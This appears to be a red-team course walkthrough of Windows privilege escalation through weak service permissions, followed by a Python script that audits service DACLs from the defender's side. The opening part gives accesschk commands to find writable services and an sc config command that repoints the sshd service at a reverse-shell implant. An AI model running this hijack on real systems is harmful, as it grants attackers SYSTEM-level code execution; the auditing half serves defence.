Now we need to check whether any service can be modified.
This command checks whether any service is modifiable by Everyone:
accesschk.exe -accepteula -wuvc "Everyone" *
This command checks whether any service is modifiable by Users:
accesschk.exe -accepteula -wuvc "Users" *
This command checks whether any service is modifiable by Authenticated Users:
accesschk.exe -accepteula -wuvc "Authenticated Users" *

As we can see, we got the sshd service, to which we have read and write access.
Now let's query the service to see what we can do with it:
sc query sshd

As we can see, the service is stopped.
Now let's query the service configuration:
sc qc sshd

Now let's change the service binary path to point to our malicious reverse shell:
sc config sshd binPath= "c:\\rto\\lpe\\implant\\implant.exe"
and then run it
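
The condition this walkthrough depends on is a service DACL that lets Everyone, Users or Authenticated Users change the service configuration. The following is an added example for auditing that condition from the defender's side, not code from the original page: it parses the SDDL string that `sc sdshow <service>` prints and reports allow ACEs granting those groups configuration-changing rights. The service names and SDDL strings in SAMPLES are constructed for illustration.

```python
import re

# SDDL trustee codes / SIDs for the three groups the accesschk commands check.
BROAD = {"WD": "Everyone", "S-1-1-0": "Everyone",
         "AU": "Authenticated Users", "S-1-5-11": "Authenticated Users",
         "BU": "Users", "S-1-5-32-545": "Users"}
# Rights that let the holder change the service's configuration or its DACL.
RISKY = {"DC": ("SERVICE_CHANGE_CONFIG", 0x2),
         "WD": ("WRITE_DAC", 0x40000),
         "WO": ("WRITE_OWNER", 0x80000),
         "GW": ("GENERIC_WRITE", 0x40000000),
         "GA": ("GENERIC_ALL", 0x10000000)}

def risky_rights(rights):
    """Names of risky rights in an SDDL rights field (2-letter codes or hex mask)."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return [name for name, bit in RISKY.values() if mask & bit]
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return [name for code, (name, _) in RISKY.items() if code in codes]

def weak_aces(sddl):
    """(group, [rights]) for each DACL allow ACE giving a broad group risky rights."""
    # Only the D: section is examined; the S: section (SACL) holds audit ACEs.
    dacl = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    findings = []
    for ace in re.findall(r"\(([^()]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")  # type;flags;rights;object;inherit_object;trustee
        if len(fields) < 6 or fields[0] != "A":
            continue
        hits = risky_rights(fields[2])
        if fields[5] in BROAD and hits:
            findings.append((BROAD[fields[5]], hits))
    return findings

# Constructed samples in the format printed by `sc sdshow <service>`.
SAMPLES = {
    "svc_default": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                   "(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "svc_weak": "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)",
    "svc_hexmask": "D:(A;;0xf01ff;;;BU)",
}

if __name__ == "__main__":
    for name, sddl in SAMPLES.items():
        print(name, weak_aces(sddl) or "ok")
```

A service that shows up here should have its DACL tightened so that only SYSTEM and administrators hold these rights.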